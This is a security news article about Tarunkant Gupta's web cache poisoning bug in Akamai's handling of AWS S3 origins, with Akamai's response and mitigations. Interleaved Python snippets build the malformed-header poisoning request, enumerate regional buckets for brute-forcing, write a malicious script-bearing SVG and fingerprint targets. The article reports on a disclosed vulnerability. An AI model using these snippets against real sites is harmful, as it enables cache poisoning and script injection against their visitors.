Akamai wrestles with AWS S3 web cache poisoning bug

Definitive solution is ‘non-trivial’ since behavior arises from customers processing non-RFC compliant requests

A vulnerability in how Akamai retrieves Amazon Web Services (AWS) S3 resources could allow attackers to stage web cache poisoning attacks against websites.

Web cache poisoning involves malicious clients forcing content delivery networks (CDNs) or web servers to cache malicious content and later serve it to other clients requesting the same resource.

Double misconfiguration

Akamai can map various HTTP requests to their corresponding S3 bucket and cache them for later retrieval. Security researcher Tarunkant Gupta discovered that he could trick the Akamai server into caching files from malicious buckets.

“A few months back I encountered a non-exploitable AWS S3 misconfiguration and I was just revisiting it to check if that still exists or not, but this time I wanted to explore all attack possibilities,” he told The Daily Swig. After trying different attack vectors, Gupta ran into a misconfiguration in Akamai’s cache servers that could be leveraged to exploit the S3 bug.

RELATED Akamai WAF bypassed via Spring Boot to trigger RCE

Akamai said creating “a blanket ‘patch’” was “not trivial, as that may have a big negative impact on legitimate internet traffic”, according to a technical writeup from Gupta. In the meantime, Gupta said users can protect themselves by rejecting, at the Akamai level, any headers containing Unicode characters.

Tampering header commands

To exploit the vulnerability, an attacker must send a web request for a benign file, but modify the request headers to add a header preceded by a hex value (e.g. ) and followed by the malicious S3 address.

If the request results in a cache hit, then the Akamai server will prioritize the header with the Unicode value over the original header and cache the malicious file to serve it to future users who request the same path.
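The request described above can be sketched as follows. This is a minimal, hedged illustration: the hostnames, path, and bucket name are hypothetical, and the exact Unicode prefix character is elided in the article (a vertical-tab character is used here purely as a stand-in).

```python
# Sketch of the poisoning request: a second Host-style header whose name
# begins with a non-RFC character. A strict parser would reject it; a
# lenient one may forward it to the origin.
def build_poisoning_request(host: str, path: str, evil_bucket_host: str,
                            prefix: str = "\u000b") -> bytes:
    # NOTE: 'prefix' is a placeholder; the article does not disclose the
    # actual character used in the attack.
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",                      # legitimate front-end host
        f"{prefix}Host: {evil_bucket_host}",  # invalid header name (Unicode prefix)
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("utf-8")

req = build_poisoning_request("victim.example", "/logo.svg",
                              "attacker-bucket.s3.amazonaws.com")
```

Because such a request is not RFC-compliant, standard HTTP client libraries typically refuse to send it; in practice it would have to go over a raw socket.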

“Because of the S3 misconfiguration, it prioritizes the first header over the target origin and Akamai’s incorrect parsing on the inclusion of Unicode character let me pass exactly what I wanted to the S3 buckets, a malicious host on the first occurrence of the header,” Gupta explained.

Attacking at scale

The attack only works if the benign and malicious files are stored in S3 buckets located in the same region. To get around this constraint, the attacker can create S3 buckets in all available regions and upload the malicious file to each of them.

Exploiting the bug would then be a matter of brute-forcing the web cache poisoning attack on the target web resource to see which bucket works.
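That brute-force step amounts to enumerating region-scoped bucket endpoints and trying each one. A minimal sketch, assuming a hypothetical bucket name and using only a small subset of AWS regions for illustration:

```python
# S3 exposes region-scoped virtual-hosted endpoints of the form
# <bucket>.s3.<region>.amazonaws.com. Trying each region until the cache
# poisoning succeeds reveals which region the target's bucket lives in.
REGIONS = ["us-east-1", "us-west-2", "eu-west-1", "ap-southeast-1"]  # subset

def candidate_bucket_hosts(bucket: str) -> list[str]:
    """Return one candidate origin host per region for the attacker's bucket."""
    return [f"{bucket}.s3.{region}.amazonaws.com" for region in REGIONS]

hosts = candidate_bucket_hosts("attacker-bucket")
```

Each candidate host would then be substituted into the malformed header and the cached response inspected for the malicious content.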

Gupta tested the attack with an SVG file, a file type that is usually cached and can contain JavaScript code – making it especially dangerous. But the attack can also work with any other file type cached by the server.
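To illustrate why SVG is a dangerous payload type, the snippet below generates a minimal SVG that executes script when rendered inline in a page. The filename and alert payload are arbitrary examples, not taken from Gupta's research:

```python
# An SVG is an XML document and may embed <script> elements, which run
# when the SVG is rendered inline (e.g. served same-origin from a cache).
MALICIOUS_SVG = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.domain)</script>
</svg>
"""

# This is the file an attacker would upload to each regional bucket.
with open("logo.svg", "w") as f:
    f.write(MALICIOUS_SVG)
```

Note that script in an SVG only executes when the file is rendered as a document, not when referenced via an `<img>` tag – which is why serving it from the victim's own cached path matters.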

Gupta also developed a pair of Python scripts that can find targets stored in S3 buckets and cached by Akamai.

“This issue is very easy to exploit, and one simple cURL can create a malicious cache,” Gupta said. “An automation script was created to exploit at scale. This issue can result in various types of attacks such as XSS, JavaScript injection, open redirection, DoS, spoofing, etc.”
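Target discovery of the kind Gupta automated could plausibly rest on response-header fingerprinting. The sketch below is an assumption-laden illustration, not Gupta's actual script: the header names checked (`X-Cache`, `Server`, `x-amz-request-id`) are commonly observed on Akamai-fronted S3 origins but are not guaranteed on every deployment.

```python
# Heuristic: a resource is an interesting target if it appears to be
# (a) served through Akamai's cache and (b) backed by an S3 origin.
def looks_like_cached_s3_resource(headers: dict) -> bool:
    x_cache = headers.get("X-Cache", "")
    # Akamai debug responses commonly report cache status as TCP_HIT/TCP_MISS.
    served_by_akamai = x_cache.startswith(("TCP_HIT", "TCP_MISS")) \
        or "akamai" in x_cache.lower()
    # S3 origins typically identify themselves via Server/x-amz-* headers.
    lower_keys = {k.lower() for k in headers}
    s3_origin = headers.get("Server", "") == "AmazonS3" \
        or "x-amz-request-id" in lower_keys
    return served_by_akamai and s3_origin
```

In a scanner, this check would run over the response headers of each crawled URL to build a candidate target list.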

RFC non-compliance

Akamai told Gupta that the configuration issue “results from certain customers’ needs to process non-RFC compliant requests for their applications to function correctly, and therefore cloud vendors offering features to support such traffic unless explicitly instructed not to do so.”

Kaan Onarlioglu, senior infosec architect at Akamai, told The Daily Swig: “By default, Akamai edge servers allow certain invalid HTTP headers to pass through, treating them as custom headers.”


This feature is necessary to support large volumes of legitimate traffic flows and origin applications that rely on invalid headers to function correctly, he said. However, it could sometimes lead to unexpected interactions between Akamai and origin servers, depending on the origin’s request processing behavior.

“Akamai provides a strict header parsing configuration option to block traffic containing invalid headers, and we strongly urge our customers to utilize it unless that interferes with their operations,” Onarlioglu continued.
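Strict header parsing of the kind Onarlioglu describes boils down to enforcing RFC 7230's "token" grammar for header names, which excludes all Unicode and control characters. A minimal sketch of such a check (this is an illustration of the concept, not Akamai's implementation):

```python
import string

# RFC 7230 defines header field names as tokens built from "tchar":
# letters, digits, and a fixed set of punctuation. Anything else -
# including the Unicode prefix used in this attack - is invalid.
TCHAR = set("!#$%&'*+-.^_`|~" + string.ascii_letters + string.digits)

def is_valid_header_name(name: str) -> bool:
    """Return True iff 'name' is a syntactically valid HTTP header name."""
    return len(name) > 0 and all(c in TCHAR for c in name)
```

Under strict parsing, a request carrying a header name like `\u000bHost` would simply be rejected at the edge rather than forwarded to the origin.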

According to Onarlioglu, Akamai is currently working on making strict header parsing a default behavior instead of offering an opt-out mechanism for customers. The work is expected to be finalized early in 2023.

Gupta advised web developers to always follow the RFCs and their recommendations. “Many companies don’t follow them and also don’t put any countermeasures around it, which sometimes becomes a serious issue,” he said.

RECOMMENDED Researcher discovers 70 web cache poisoning vulnerabilities, nets $40k in bug bounty rewards
